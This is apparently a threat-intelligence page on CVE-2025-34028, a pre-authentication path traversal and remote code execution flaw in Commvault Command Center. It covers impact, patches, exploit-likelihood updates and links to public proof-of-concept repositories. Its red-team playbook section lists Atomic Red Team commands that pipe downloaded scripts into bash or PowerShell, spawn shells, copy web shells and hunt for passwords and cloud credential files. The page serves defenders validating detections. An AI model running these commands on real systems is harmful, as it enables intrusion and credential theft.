CVE-2025-34028
Overview
This vulnerability is a path traversal flaw in the Commvault Command Center Innovation Release's ZIP file handling mechanism. The root cause lies in insufficient validation of file paths within uploaded ZIP install packages, allowing directory traversal sequences to escape the intended extraction directory. The affected component is the server-side package deployment functionality responsible for processing and expanding these ZIP files.
Vulnerability Description
The Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files that represent install packages that, when expanded by the target server, are vulnerable to path traversal vulnerability that can result in Remote Code Execution via malicious JSP. This issue affects Command Center Innovation Release: 11.38.0 to 11.38.20. The vulnerability is fixed in 11.38.20 with SP38-CU20-433 and SP38-CU20-436 and also fixed in 11.38.25 with SP38-CU25-434 and SP38-CU25-438.
Impact
An unauthenticated attacker can exploit this flaw to execute arbitrary code on the Commvault server by uploading malicious JSP files via crafted ZIP packages. This leads to full system compromise without requiring any prior authentication or user interaction. The attacker gains the ability to execute commands remotely, potentially accessing sensitive data, disrupting services, or moving laterally within the network environment.
Solution
Apply the vendor-provided patches as detailed in Commvault security advisory CV_2025_04_1. Specifically, update Command Center Innovation Release to version 11.38.20 with service packs SP38-CU20-433 and SP38-CU20-436, or to version 11.38.25 with SP38-CU25-434 and SP38-CU25-438. Refer to https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html for comprehensive patching instructions and verification steps.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Commvault Command Center Innovation Release arises from an unauthenticated file upload feature that permits malicious actors to upload ZIP files containing crafted install packages. When these ZIP files are extracted on the target server, they exploit a path traversal vulnerability, allowing attackers to manipulate file paths and potentially execute arbitrary code. This flaw is particularly dangerous because it enables an attacker to upload malicious JavaServer Pages (JSP) files, which can be executed on the server, leading to remote code execution (RCE). The severity of this vulnerability is underscored by its maximum CVSS score of 10.0, indicating a critical risk that requires immediate attention.
The attack vectors for this vulnerability are straightforward yet effective. An attacker can leverage the unauthenticated upload capability to introduce a specially crafted ZIP file into the system. Once uploaded, the server’s extraction process does not adequately validate the file paths, allowing the attacker to place malicious JSP files in locations accessible to the web server. This exploitation can occur without any user authentication, making it particularly appealing to threat actors. Scenarios could include an attacker targeting a vulnerable system within a corporate network, leading to unauthorized access to sensitive data, lateral movement within the network, or even complete system compromise.
The real-world impact of this vulnerability can be devastating for organizations using the affected versions of the Commvault Command Center. Successful exploitation could lead to unauthorized access to critical data, disruption of services, and significant financial losses due to operational downtime and recovery efforts. Furthermore, the potential for data breaches could result in regulatory penalties and reputational damage, particularly for organizations handling sensitive information. The risk escalates when considering the possibility of attackers using compromised systems to launch further attacks against other connected systems, thereby expanding the attack surface.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to apply the available patches, specifically the updates provided in versions 11.38.20 and 11.38.25, which address this vulnerability directly. Regularly updating software and systems is a fundamental practice in cybersecurity hygiene. Additionally, organizations should employ web application firewalls (WAFs) to monitor and filter incoming traffic, particularly focusing on file upload functionalities. Intrusion detection systems (IDS) can also be configured to identify suspicious file uploads and alert administrators to potential exploitation attempts.
In conclusion, the vulnerability within the Commvault Command Center represents a significant threat to organizations that utilize this software. The combination of unauthenticated access, file upload capabilities, and path traversal exploitation creates a pathway for remote code execution, with far-reaching implications for data security and operational integrity. Organizations must prioritize patch management, implement robust detection mechanisms, and educate their teams on the risks associated with such vulnerabilities to safeguard against potential exploitation.
CSURFACE threat intelligence has observed a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-34028, rising by approximately 10.8%. This uptick reflects heightened potential for exploitation despite a concurrent notable reduction in detection activity across our telemetry, suggesting adversaries may be refining their tactics to evade current detection mechanisms. Additionally, new proof-of-concept exploits have emerged on public repositories, expanding the toolkit available to threat actors and lowering the barrier for exploitation attempts. Although ransomware usage linked to this vulnerability remains unconfirmed, the elevated EPSS score and the availability of multiple scanning and exploitation scripts indicate an increased likelihood of opportunistic attacks. Consequently, the threat level for CVE-2025-34028 should be considered elevated, with adversaries potentially preparing for broader operational use. Defenders must remain vigilant as the evolving exploit landscape could translate into more frequent and sophisticated intrusion attempts targeting vulnerable Commvault Command Center deployments.
Update 2 — June 20, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-34028, reflected by a significant rise in telemetry signals and a substantial increase in the Exploit Prediction Scoring System (EPSS) score. This upward trend coincides with the emergence of additional publicly available proof-of-concept exploits, including advanced scanning and remote code execution tools, which lower the barrier for adversaries to identify and compromise vulnerable Commvault Command Center instances. The convergence of increased detection activity and expanding exploit resources amplifies the risk of opportunistic attacks, potentially accelerating the timeline for widespread exploitation. Although ransomware involvement remains unconfirmed, the evolving exploit landscape and heightened attacker interest necessitate an elevated threat posture. Defenders should interpret these developments as indicative of a growing likelihood of targeted intrusion attempts leveraging this critical vulnerability.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Commvault | Commvault | All |
cpe:2.3:a:commvault:commvault:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
watchtowrlabs/watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028
|
watchtowrlabs | 21 | 9 | 2025-04-17 | View |
|
Mattb709/CVE-2025-34028-PoC-Commvault-RCE
Proof-of-Concept (PoC) for CVE-2025-34028, a Remote Code Execution vulnerability in Commvault Command Center. This Pytho...
|
Mattb709 | 2 | 0 | 2025-05-06 | View |
|
becrevex/Commvault-CVE-2025-34028
Commvault Remote Code Execution (CVE-2025-34028) NSE
|
becrevex | 1 | 0 | 2025-05-06 | View |
|
tinkerlev/commvault-cve2025-34028-check
Commvault CVE-2025-34028 endpoint scanner using Nmap NSE. For ethical testing and configuration validation.
|
tinkerlev | 0 | 0 | 2025-04-24 | View |
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-34028 |
| documentation.commvault.com |
GitHub CVE
vendor-advisory
|
https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html |
| labs.watchtowr.com |
GitHub CVE
exploit
|
https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/ |
| github.com |
GitHub CVE
exploit
|
https://github.com/watchtowrlabs/watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028 |
| vulncheck.com |
GitHub CVE
third-party-advisory
|
https://www.vulncheck.com/advisories/commvault-command-center-innovation-release-unauthenticated-install-package-path-traversal |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-34028 |